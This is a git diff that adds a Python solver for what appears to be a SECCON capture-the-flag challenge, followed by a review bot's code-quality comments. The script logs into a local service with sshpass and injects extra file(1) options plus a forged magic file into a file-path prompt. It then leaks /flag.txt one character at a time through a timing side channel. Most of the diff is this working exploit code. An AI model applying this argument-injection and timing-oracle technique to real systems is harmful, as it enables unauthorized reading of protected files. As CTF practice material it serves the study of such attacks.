Diffstat (limited to 'solve/solve.py')
-rw-r--r--solve/solve.py56
1 files changed, 56 insertions, 0 deletions
diff --git a/solve/solve.py b/solve/solve.py
new file mode 100644
index 0000000..64bf712
--- /dev/null
+++ b/solve/solve.py
@@ -0,0 +1,56 @@
+from pwn import *
+import time
+
+cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \
+ + f"-oCheckHostIP=no ctf@localhost -p 2022"
+
+magic_file = """
+
+#------------------------------------------------------------------------------
+# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $
+# warc: file(1) magic for WARC files
+
+0 string {} SECCON FLAG
+!:mime application/warc
+
+"""
+
+n = 0
+avg = 5
+def getchar(prefix=""):
+ global n, avg
+
+ alph = string.ascii_lowercase + string.digits + "_"
+ alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~'
+ for c in alph:
+ attempt = prefix + c
+ print(f">>> {attempt}")
+ io = process(cmd.split(), stdin=PTY, raw=False)
+ io.readuntil(b"Input a file path: ")
+ io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full")
+ io.sendline(magic_file.format(attempt).encode())
+ io.send(b"\4")
+ start = time.time()
+ print(io.readall())
+ end = time.time()
+ dur = end - start
+
+ print("DUR", dur)
+ print("AVG", avg)
+ if end - start >= avg + 5:
+ return c
+ n += 1
+ avg = ((n - 1) * avg + dur) / n
+ io.close()
+ return None
+
+flag = "SECCON{"
+while True:
+ try:
+ while c := getchar(prefix=flag):
+ flag += c
+ print(flag)
+ except Exception as e:
+ raise e
+ print("Exception, sleeping..")
+ time.sleep(30)
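Review bot: In `getchar`, the early `return c` inside the `if end - start >= avg + 5:` branch skips the `io.close()` at the bottom of the loop body, so every matched character leaves an ssh child process and its PTY open. Calling `io.close()` right after `print(io.readall())` would cover both paths. In the driver loop, `except Exception as e: raise e` makes the `print("Exception, sleeping..")` and `time.sleep(30)` lines unreachable, so either drop the `raise e` or drop the two dead lines. The first `alph = string.ascii_lowercase + string.digits + "_"` assignment is overwritten on the next line, and `string` is only in scope through `from pwn import *`. A short module comment would also help, for example `# Solver for the local challenge instance (ctf@localhost:2022); infers each flag character from response time.`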